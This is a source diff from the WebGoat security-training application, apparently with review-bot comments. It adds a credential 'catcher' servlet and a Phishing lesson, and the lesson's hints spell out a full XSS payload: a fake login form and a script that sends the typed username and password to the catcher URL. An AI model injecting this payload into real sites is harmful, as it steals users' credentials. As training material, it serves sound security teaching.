diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/Catcher.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/Catcher.java
new file mode 100644
index 000000000..c23bd5152
--- /dev/null
+++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/Catcher.java
@@ -0,0 +1,116 @@
+package org.owasp.webgoat;
+
+import java.io.IOException;
+import java.util.Enumeration;
+
+import javax.servlet.ServletException;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+
+import org.owasp.webgoat.lessons.AbstractLesson;
+import org.owasp.webgoat.session.Course;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ *
+ *
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ *
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ *
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author Bruce Mayhew WebGoat
+ * @created March 13, 2007
+ */
+public class Catcher extends HammerHead
+{
+
+ /**
+ * Description of the Field
+ */
+ public final static String START_SOURCE_SKIP = "START_OMIT_SOURCE";
+
+ public final static String END_SOURCE_SKIP = "END_OMIT_SOURCE";
+
+ public static final String PROPERTY = "PROPERTY";
+
+ public static final String EMPTY_STRING = "";
+
+
+ /**
+ * Description of the Method
+ *
+ * @param request Description of the Parameter
+ * @param response Description of the Parameter
+ * @exception IOException Description of the Exception
+ * @exception ServletException Description of the Exception
+ */
+ public void doPost(HttpServletRequest request, HttpServletResponse response)
+ throws IOException, ServletException
+ {
+ try
+ {
+ //System.out.println( "Entering doPost: " );
+ //System.out.println( " - request " + request);
+ //System.out.println( " - principle: " + request.getUserPrincipal() );
+ //setCacheHeaders(response, 0);
+ WebSession session = (WebSession) request.getSession(true)
+ .getAttribute(WebSession.SESSION);
+ session.update(request, response, this.getServletName()); // FIXME: Too much in this call.
+
+ int scr = session.getCurrentScreen();
+ Course course = session.getCourse();
+ AbstractLesson lesson = course.getLesson(session, scr,
+ AbstractLesson.USER_ROLE);
+
+ log(request, lesson.getClass().getName() + " | "
+ + session.getParser().toString());
+
+ String property = new String(session.getParser().getStringParameter(
+ PROPERTY, EMPTY_STRING));
+
+ // if the PROPERTY parameter is available - write all the parameters to the
+ // property file. No other control parameters are supported at this time.
+ if ( !property.equals(EMPTY_STRING))
+ {
+ Enumeration e = session.getParser().getParameterNames();
+
+ while (e.hasMoreElements())
+ {
+ String name = (String) e.nextElement();
+ String value= session.getParser().getParameterValues(name)[0];
+ lesson.getLessonTracker(session).getLessonProperties().setProperty(
+ name, value);
+ }
+ }
+ lesson.getLessonTracker(session).store(session, lesson);
+
+ }
+ catch (Throwable t)
+ {
+ t.printStackTrace();
+ log("ERROR: " + t);
+ }
+ }
+}
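Review bot: The `WebSession` looked up from the session attribute (`getAttribute(WebSession.SESSION)`) is used without a null check, so a request that reaches this catcher without an established WebGoat session throws a NullPointerException at `session.update(...)`, which the `catch (Throwable t)` then turns into a stderr stack trace while the client still receives an empty 200. Suggest guarding before the update: `if (session == null) { response.sendError(HttpServletResponse.SC_FORBIDDEN); return; }`, and narrowing the catch to `Exception` so that JVM `Error`s are not swallowed either. Separately, `new String(session.getParser().getStringParameter(PROPERTY, EMPTY_STRING))` copies an already-immutable String for no benefit; `String property = session.getParser().getStringParameter(PROPERTY, EMPTY_STRING);` is sufficient. Note also that the loop stores every request parameter name and value into the lesson properties with no bound on count or length, which is worth documenting on the class since the class Javadoc currently only says "Description of the Field".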
diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/LessonSource.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/LessonSource.java
index 9f8ff6470..79acbe650 100644
--- a/ webgoat/main/project/JavaSource/org/owasp/webgoat/LessonSource.java
+++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/LessonSource.java
@@ -67,80 +67,50 @@ public class LessonSource extends HammerHead
public void doPost(HttpServletRequest request, HttpServletResponse response)
throws IOException, ServletException
{
- String source = null;
-
- try
- {
- //System.out.println( "Entering doPost: " );
- //System.out.println( " - request " + request);
- //System.out.println( " - principle: " + request.getUserPrincipal() );
- //setCacheHeaders(response, 0);
- WebSession session = (WebSession) request.getSession(true)
- .getAttribute(WebSession.SESSION);
- session.update(request, response, this.getServletName()); // FIXME: Too much in this call.
-
- // Get the Java source of the lesson. FIXME: Not needed
- source = getSource(session);
-
- int scr = session.getCurrentScreen();
- Course course = session.getCourse();
- AbstractLesson lesson = course.getLesson(session, scr,
- AbstractLesson.USER_ROLE);
- lesson.getLessonTracker(session).setViewedSource(true);
- }
- catch (Throwable t)
- {
- t.printStackTrace();
- log("ERROR: " + t);
- }
- finally
- {
- try
- {
- this.writeSource(source, response);
- }
- catch (Throwable thr)
- {
- thr.printStackTrace();
- log(request, "Could not write error screen: "
- + thr.getMessage());
- }
- //System.out.println( "Leaving doPost: " );
-
- }
+ String source = null;
+
+ try
+ {
+ //System.out.println( "Entering doPost: " );
+ //System.out.println( " - request " + request);
+ //System.out.println( " - principle: " + request.getUserPrincipal() );
+ //setCacheHeaders(response, 0);
+ WebSession session = (WebSession) request.getSession(true)
+ .getAttribute(WebSession.SESSION);
+ session.update(request, response, this.getServletName()); // FIXME: Too much in this call.
+
+ // Get the Java source of the lesson. FIXME: Not needed
+ source = getSource(session);
+
+ int scr = session.getCurrentScreen();
+ Course course = session.getCourse();
+ AbstractLesson lesson = course.getLesson(session, scr,
+ AbstractLesson.USER_ROLE);
+ lesson.getLessonTracker(session).setViewedSource(true);
+ }
+ catch (Throwable t)
+ {
+ t.printStackTrace();
+ log("ERROR: " + t);
+ }
+ finally
+ {
+ try
+ {
+ this.writeSource(source, response);
+ }
+ catch (Throwable thr)
+ {
+ thr.printStackTrace();
+ log(request, "Could not write error screen: "
+ + thr.getMessage());
+ }
+ //System.out.println( "Leaving doPost: " );
+
+ }
}
- protected WebSession updateSession_DELETEME(HttpServletRequest request,
- HttpServletResponse response, ServletContext context)
- {
- HttpSession hs;
- hs = request.getSession(true);
-
- //System.out.println( "Entering Session_id: " + hs.getId() );
- // dumpSession( hs );
-
- // Make a temporary session to avoid the concurreny issue
- // in WebSession
- WebSession session = new WebSession(this, context);
-
- WebSession realSession = null;
- Object o = hs.getAttribute(WebSession.SESSION);
-
- if ((o != null) && o instanceof WebSession)
- {
- realSession = (WebSession) o;
- }
- session.setCurrentScreen(realSession.getCurrentScreen());
- session.setCourse(realSession.getCourse());
- session.setRequest(request);
-
- // to authenticate
- //System.out.println( "Leaving Session_id: " + hs.getId() );
- //dumpSession( hs );
- return (session);
- }
-
/**
* Description of the Method
diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java
new file mode 100644
index 000000000..5077ddd0d
--- /dev/null
+++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java
@@ -0,0 +1,282 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.B;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.Comment;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.HR;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.Catcher;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ *
+ *
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ *
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ *
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author Bruce Mayhew WebGoat
+ * @created March 13, 2007
+ */
+public class Phishing extends LessonAdapter
+{
+
+ /**
+ * Description of the Field
+ */
+ protected final static String SEARCH = "Username";
+ private String searchText;
+
+
+ /**
+ * Description of the Method
+ *
+ * @param s Description of the Parameter
+ * @return Description of the Return Value
+ */
+ private boolean postedCredentials(WebSession s)
+ {
+ String postedToCookieCatcher = getLessonTracker(s).getLessonProperties()
+ .getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING);
+
+ //
+ return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING));
+ //
+ }
+
+
+ /**
+ * Description of the Method
+ *
+ * @param s Description of the Parameter
+ * @return Description of the Return Value
+ */
+ protected Element createContent(WebSession s)
+ {
+ ElementContainer ec = new ElementContainer();
+
+ try
+ {
+ searchText = s.getParser().getRawParameter(SEARCH,"");
+ //
+ //
+
+ ec.addElement(makeSearch(s));
+ if (postedCredentials(s))
+ {
+ makeSuccess(s);
+ }
+ }
+ catch (Exception e)
+ {
+ s.setMessage("Error generating " + this.getClass().getName());
+ }
+
+ return (ec);
+ }
+
+
+ protected Element makeSearch(WebSession s)
+ {
+ ElementContainer ec = new ElementContainer();
+
+ ec.addElement(new H1().addElement("WebGoat Search "));
+ Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
+ .setAlign("center");
+
+ TR tr = new TR();
+ tr.addElement(new TD().addElement(" ").setColSpan(2));
+ t.addElement(tr);
+ if (s.isColor())
+ {
+ t.setBorder(1);
+ }
+
+ tr = new TR();
+ tr
+ .addElement(new TH()
+ .addElement(
+ "This facility will search the WebGoat source.")
+ .setColSpan(2).setAlign("center"));
+ t.addElement(tr);
+
+ tr = new TR();
+ tr.addElement(new TD().addElement(" ").setColSpan(2));
+ t.addElement(tr);
+
+ TR row1 = new TR();
+ row1.addElement(new TD(new B(new StringElement("Search: "))).setAlign("right"));
+
+ Input input1 = new Input(Input.TEXT, SEARCH, searchText);
+ row1.addElement(new TD(input1).setAlign("left"));
+ t.addElement(row1);
+
+ Element b = ECSFactory.makeButton("Search");
+ t.addElement(new TR(new TD(b).setColSpan(2)).setAlign("center"));
+ ec.addElement(t);
+
+ if (!searchText.equals(""))
+ {
+ ec.addElement(new BR());
+ ec.addElement(new HR());
+ ec.addElement(new BR());
+ ec.addElement(new StringElement("Results for: " + searchText));
+ ec.addElement(new Comment("Search results"));
+ ec.addElement(new BR());
+ ec.addElement(new BR());
+ ec.addElement(new B(new StringElement("No results were found.")));
+ ec.addElement(new Comment("End of Search results"));
+ }
+
+ return (ec);
+ }
+
+
+ /**
+ * Gets the hints attribute of the CluesScreen object
+ *
+ * @return The hints value
+ */
+ protected List getHints()
+ {
+ List hints = new ArrayList();
+ hints
+ .add("Try adding HTML to the search field to create a fake authentication form.
" +
+ "Try to make the form look official.");
+ hints.add("Try:
" +
+ "password<form><br><br><HR><H3>This feature requires account login:</H2" +
+ "><br><br>Enter Username:<br><input type="text" id="user" " +
+ "name="user"><br>Enter Password:<br><input type="password" " +
+ "name = "pass"><br></form><br><br><HR>");
+ hints.add("Add functionality that can post a request, a button might work
" +
+ "After getting the button on the page, don't forget you will need to steal the credentials and post them to:
" +
+ "http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
+ hints.add("Try:
" +
+ "<input type="submit" name="login" " +
+ "value="login">"+
+ "
Solution for this hint:
" +
+ "password<form><br><br><HR><H3>This feature requires account login:</H2" +
+ "><br><br>Enter Username:<br><input type="text" id="user" " +
+ "name="user"><br>Enter Password:<br><input type="password" " +
+ "name = "pass"><br><input type="submit" name="login" " +
+ "value="login" onclick="hack()"></form><br><br><HR>");
+ hints.add("Make the button perform an action on submit,
" +
+ "adding an onclick=\"hack()\" might work
"+
+ "Don't forget to add the hack() javascript function" +
+ "
Solution for this hint:
" +
+ "password<form><br><br><HR><H3>This feature requires account login:</H2" +
+ "><br><br>Enter Username:<br><input type="text" id="user" " +
+ "name="user"><br>Enter Password:<br><input type="password" " +
+ "name = "pass"><br><input type="submit" name="login" " +
+ "value="login" onclick="hack()"></form><br><br><HR>");
+ hints.add("You need to create the hack() function. This function will pull the credentials from the " +
+ "webpage and post them to the WebGoat catcher servlet.
" +
+ "
Some useful code snippets:" +
+ "- doucument.forms[0].user.value - will access the user field" +
+ "
- XssImage = new Image(); XssImage.src=SOME_URL = will perform a post" +
+ "
- javascript string concatentation uses a \"+\"
" +
+ "
Solution for this hint():
" +
+ "password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen." +
+ "\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); " +
+ "XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+" +
+ "document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}" +
+ "</script>");
+ hints.add("Complete solution for this lesson:
" +
+ "password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen." +
+ "\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); " +
+ "XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+" +
+ "document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}" +
+ "</script><form><br><br><HR><H3>This feature requires account login:</H2" +
+ "><br><br>Enter Username:<br><input type="text" id="user" " +
+ "name="user"><br>Enter Password:<br><input type="password" " +
+ "name = "pass"><br><input type="submit" name="login" " +
+ "value="login" onclick="hack()"></form><br><br><HR>");
+ /**
+ * password
FeedbackAddress
- <A HREF=mailto:webgoat@g2-inc.com>webgoat@g2-inc.com</A>
+ <A HREF=mailto:WebGoat@g2-inc.com>WebGoat@g2-inc.com</A>
@@ -174,6 +174,14 @@
org.owasp.webgoat.LessonSource
+
+ CookieCatcher
+
+ This servlet catches any posts and marks the appropriate lesson property.
+
+ org.owasp.webgoat.CookieCatcher
+
+
conf
/lessons/ConfManagement/config.jsp
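Review bot: The servlet class registered here, `org.owasp.webgoat.CookieCatcher`, does not match the class this commit actually adds, `org.owasp.webgoat.Catcher`; unless a `CookieCatcher` class already exists elsewhere in the tree, the container will fail to instantiate the `CookieCatcher` servlet and the `/catcher` mapping added further down in this file will not work. Assuming this is the deployment descriptor (the element tags appear stripped in this rendering), the class line should read `<servlet-class>org.owasp.webgoat.Catcher</servlet-class>`. The enclosing servlet definition block continues outside this hunk.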
@@ -195,8 +203,7 @@
It is also legal to define more than one mapping for the same
servlet, if you wish to.
-->
-
-
+
AxisServlet
/servlet/AxisServlet
@@ -235,11 +242,16 @@
/source
+
+ CookieCatcher
+ /catcher
+
+
conf
/conf
-
+